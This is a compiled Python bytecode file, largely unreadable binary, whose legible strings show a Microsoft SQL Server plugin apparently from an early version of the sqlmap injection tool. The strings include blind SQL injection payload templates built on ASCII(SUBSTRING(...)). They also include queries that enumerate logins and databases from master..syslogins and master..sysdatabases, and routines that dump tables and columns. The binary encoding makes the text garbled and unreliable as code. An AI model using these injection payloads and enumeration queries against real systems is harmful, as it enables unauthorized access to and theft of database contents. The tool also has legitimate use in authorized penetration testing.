³ò ‰ŸFc@sZddkZddkZddkZddkZddklZdefd„ƒYZdS(iÿÿÿÿN(tUnionUsetMSSQLServerMapcBsžeZdZd„Zd„Zd„Zd„Zd„Zd„Zd„Z d„Z d „Z d „Z d „Z d „Zd „Zd„Zd„Zd„ZRS(sW This class defines Microsoft SQL Server methods @author: Bernardo Damele cCs^||_tidƒ|_d|_d|_g|_g|_g|_h|_ h|_ dS(Nt sqlmapLogt( targstloggingt getLoggertloggert_MSSQLServerMap__bannert_MSSQLServerMap__currentDbt_MSSQLServerMap__fingerprintt_MSSQLServerMap__cachedUserst_MSSQLServerMap__cachedDbst_MSSQLServerMap__cachedTablest_MSSQLServerMap__cachedColumns(tselfR((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt__init__s       cCsýxötoî|idƒ}|djoPn|d}||idƒ}|djotd|‚n||}d|||!}d}xNt||ƒD]=}|dt||ƒ7}||djo|d7}q—q—W|d 7}|i||ƒ}qW|S( Nt'iÿÿÿÿisUnenclosed ' in '%s's'%s't(sCHAR(%d)t+t)(tTruetfindt Exceptiontrangetordtreplace(Rt expressiontindext firstIndext lastIndextoldt unescapedti((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytunescape s&      cCs|idddƒS(Ns' AND ASCII(SUBSTRING((%s), %d, 1)) > %ds2 AND ASCII(SUBSTRING((%s), %d, 1)) > %d AND '1'='1s2 AND ASCII(SUBSTRING((%s), %d, 1)) > %d AND "1"="1(t injectionStm(R((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt createStm;s cCsÅ|iipdSn|id|iƒ}d|}|iowtid|iƒ}|o=d|iƒd}|iƒd}|i||gƒ}nd }|d ||f7}n||i_|S( NsMicrosoft SQL Serversactive fingerprint: %ss,Microsoft SQL Server\s+([\d\.]+) - ([\d\.]+)s Microsoft SQL Server %s, versioniit is! %sbanner parsing fingerprint: %ss ( Rt exaustiveFptparseFpR Rtretsearchtgroupst fingerprint(RtactVertvaluetbanVertreleasetblank((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetFingerprintAs    cCs=d}|ii|ƒ|ip|idƒ|_n|iS(Nsfetching banners @@VERSION(RtinfoRtgetValue(RtlogMsg((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt getBannerWs  cCs#d}|ii|ƒ|idƒS(Nsfetching current users USER_NAME()(RR2R3(RR4((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetCurrentUserascCs<d}|ii|ƒ|io |iSn|idƒSdS(Nsfetching current databases DB_NAME()(RR2R R3(RR4((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt getCurrentDbhs   cCsîd}|ii|ƒd}|i|ƒ}t|ƒ p |djod}t|‚nd}|ii|ƒg}x^tt|ƒƒD]J}d}|d|7}|d7}|d 7}|i|ƒ}|i|ƒqˆW|p td ‚n|S( Ns!fetching number of database userss5SELECT LTRIM(STR(COUNT(name))) FROM master..sysloginst0s/unable to retrieve the number of database userssfetching database userss)SELECT TOP 1 name FROM master..syslogins s&WHERE name NOT IN (SELECT TOP %d name s&FROM master..syslogins ORDER BY name) s ORDER BY names%unable to retrieve the database users(RR2R3tlenRRtinttappend(RR4tstmtcountterrMsgtusersRtuser((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetUsersrs*    cCsd}|d7}t|‚dS(Ns-Microsoft SQL Server plugin does not support s%the password hashes functionality yet(R(RR>((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetPasswordHashes’s cCsýd}|ii|ƒd}|i|ƒ}t|ƒ p |djod}t|‚nd}|ii|ƒg}x^tt|ƒƒD]J}d}|d|7}|d7}|d 7}|i|ƒ}|i|ƒqˆW|o ||_nd }t|‚|S( Nsfetching number of databasess8SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabasesR8s*unable to retrieve the number of databasessfetching database namess,SELECT TOP 1 name FROM master..sysdatabases s&WHERE name NOT IN (SELECT TOP %d name s)FROM master..sysdatabases ORDER BY name) s ORDER BY names%unable to retrieve the database names( RR2R3R9RRR:R;R (RR4R<R=R>tdbsRtdb((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetDbs˜s.     c Cs1|iip-t|iƒp|iƒ}qu|i}n<d|iijo|iiidƒ}n|iig}h}x{|D]s}d|}|ii|ƒd}|d|7}|d7}|i|ƒ}t|ƒ p |djo+d}|d|7}|ii |ƒq‚nd |}|ii|ƒg}x„t t |ƒƒD]p} d }|d |7}|d 7}|d | 7}|d|7}|d7}|d7}|i|ƒ} |i | ƒqHW|o|||((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt getTables¼s\           c Csq|iipd}t|‚nd|iijo+|iiidƒ\|i_|i_n|iip'd}|d7}|d7}t|‚nd}|d|ii|iif7}|ii|ƒd}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d|ii7}|d|ii7}|d7}|i|ƒ}t|ƒ p |djo;d}|d|ii7}|d|ii7}t|‚nd|ii}|d|ii7}|ii|ƒh}h}h}xæt t |ƒƒD]Ò}d}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d|ii7}|d|ii7}|d7}|d|7}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d |ii7}|d|ii7}|d|ii7}|d7}|i|ƒ} d}|d|ii7}|d|ii7}|d| 7}|d|ii7}|d|ii7}|i|ƒ} | || R4R<R=t tableColumnsRLtcolumnsRtcolumntcoltype((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt getColumnsüs  +          cCsÇ|iipd}t|‚nd|iijo+|iiidƒ\|i_|i_n|iip'd}|d7}|d7}t|‚n|ip|iƒ|_nd}|d|ii|iif7}|ii|ƒd|ii|iif}h}d |}|i |ƒ}t |ƒ p |d jo;d }|d |ii7}|d |ii7}t|‚n|ii o|ii idƒ|i_ n|i|ii|ii}xj|i ƒD]\}|ii o||ii joqÌnd|}|d|ii7}|d |ii7}|ii|ƒd} g} h} h||R4tfromExprt columnValuesR<R=RQRRRURVt columnDataRR-tinfos((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt dumpTableVs‚  +                   cCsd}|d7}t|‚dS(Ns!Microsoft SQL Server plugin does snot support file reading(R(RtfilenameR>((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetFile¯s cCs/|iio|i|ƒSn|i|ƒSdS(N(RtunionUseR3(RR((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pytgetExprµs cCsù|iidjo%d|i_|iiptSq8nd}|ii|ƒtti ddƒƒ}d|}|i |ƒdjoUd|i_|iiptSng|_ |ii o|i dƒ|_ ntSnd }|ii|ƒtSdS( Nsmicrosoft sql serversMicrosoft SQL Serverstesting Microsoft SQL Serverii sLTRIM(STR(LEN(%s)))t1s @@VERSIONs+the remote DMBS is not Microsoft SQL Server(RtdbmsR+R&RRR2R[trandomtrandintR3R R5RRHtFalse(RR4trandIntR<RJ((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyt checkDbms¼s&        (t__name__t __module__t__doc__RR"R$R1R5R6R7RARBRERMRTRaRcReRl(((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyR s"      $ @ Z Y  (RRhR(ttimet lib.unionRR(((s@/usr/local/www/apache22/data/stuff/sql/plugins/mssqlservermap.pyss